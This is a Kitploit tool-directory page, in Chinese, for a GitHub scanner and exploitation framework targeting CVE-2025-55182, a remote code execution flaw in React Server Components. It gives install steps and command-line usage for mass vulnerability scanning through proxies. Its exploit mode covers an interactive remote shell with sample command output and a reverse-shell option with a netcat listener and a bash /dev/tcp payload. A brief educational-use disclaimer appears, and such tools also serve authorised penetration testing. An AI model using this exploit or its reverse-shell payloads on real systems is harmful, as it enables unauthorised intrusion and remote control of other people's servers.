Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 针对 React Server Components(CVE-2025-55182)的严重 RCE 漏洞扫描器。自动化利用框架,支持多载荷、代理功能及交互式命令执行。 | Kitploit
工具/GitHubGitHub/alihzsec/cve-2025-55182
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具Payload 开发
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

针对 React Server Components(CVE-2025-55182)的严重 RCE 漏洞扫描器。自动化利用框架,支持多载荷、代理功能及交互式命令执行。

查看仓库
15139个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 扫描与利用工具

[!Warning] 本仓库仅用于教育和研究目的。

  • 请仅在您拥有或已获得明确许可的系统上使用所提供的PoC。
  • 未经授权的访问、利用或滥用本仓库中的任何材料都是非法的。
  • 作者不对因不当使用造成的任何损害、误用或法律后果承担责任。

🔍 概述

CVE-2025-55182 是一个严重远程代码执行漏洞,影响 React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0。该漏洞源于对 Server Function 端点的 HTTP 请求负载进行不安全的反序列化,允许未经身份验证的攻击者远程执行任意代码。


🐛 漏洞详情

CVE 编号:CVE-2025-55182
受影响版本:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 安装

前提条件

  • Python 3.8 或更高版本
  • pip(Python 包管理器)

设置

  1. 克隆仓库
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. 创建虚拟环境(推荐)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. 安装依赖
root@kitploit:~
pip install -r requirements.txt

📖 使用

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Arguments

参数

参数描述
-d, --detection运行检测模式(扫描漏洞)
-e, --exploit运行利用模式(攻击单个目标)
-u, --url URL要扫描/攻击的单个目标 URL
-l, --list FILE包含目标 URL 列表的文件(仅检测模式)
-p, --proxy URL单个代理 URL(例如 http://127.0.0.1:8080)
-pl, --proxy-list FILE包含代理 URL 列表的文件(每行一个)
-t, --threads N并发线程数(默认:10,仅检测模式)
-s, --silent静默模式 - 仅显示存在漏洞的目标(仅检测模式)
-o, --output [FILE]将存在漏洞的目标保存到文件(仅检测模式)。如果未提供文件名,则使用默认值:CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debug启用调试日志 - 显示响应详情和重试尝试(静默模式不可用)

🎯 检测模式

扫描单个目标

root@kitploit:~
python3 main.py -d -u https://example.com

从文件扫描多个目标

root@kitploit:~
python3 main.py -d -l targets.txt

使用代理扫描

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

静默模式(仅输出存在漏洞的目标)

root@kitploit:~
python3 main.py -d -l targets.txt -s

多线程扫描

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 利用模式

交互式 Shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

然后选择 [i] 进入交互式 Shell:

root@kitploit:~
选择利用方式:
  [i] 交互式 Shell
  [r] 反弹 Shell

输入你的选择 (i/r):i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

反弹 Shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

然后选择 [r] 进入反弹 Shell 并选择载荷类型:

选项 1:默认载荷(推荐)

root@kitploit:~
选择利用方式:
  [i] 交互式 Shell
  [r] 反弹 Shell

输入你的选择 (i/r):r

选择载荷选项:
  [d] 使用默认载荷(尝试多种反弹 Shell)
  [c] 提供自定义载荷

输入你的选择 (d/c):d

按照以下格式输入你的 IP 和端口:
示例:192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

使用以下命令设置你的监听器:
nc -lvnp 4444

当你的监听器就绪后,按回车键...

该工具将自动尝试 17 种以上的反弹 Shell 载荷,直到成功为止。

选项 2:自定义载荷

root@kitploit:~
输入你的选择 (d/c):c

输入你的自定义反弹 Shell 载荷:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 参考

  • React 官方安全公告
  • Meta 安全公告
  • Vercel 安全公告
  • Next.js 安全公告
  • CVE 详情

如果你觉得这个工具有用,请考虑给它一个星标!⭐
由安全社区用 ❤️ 制作
下载工具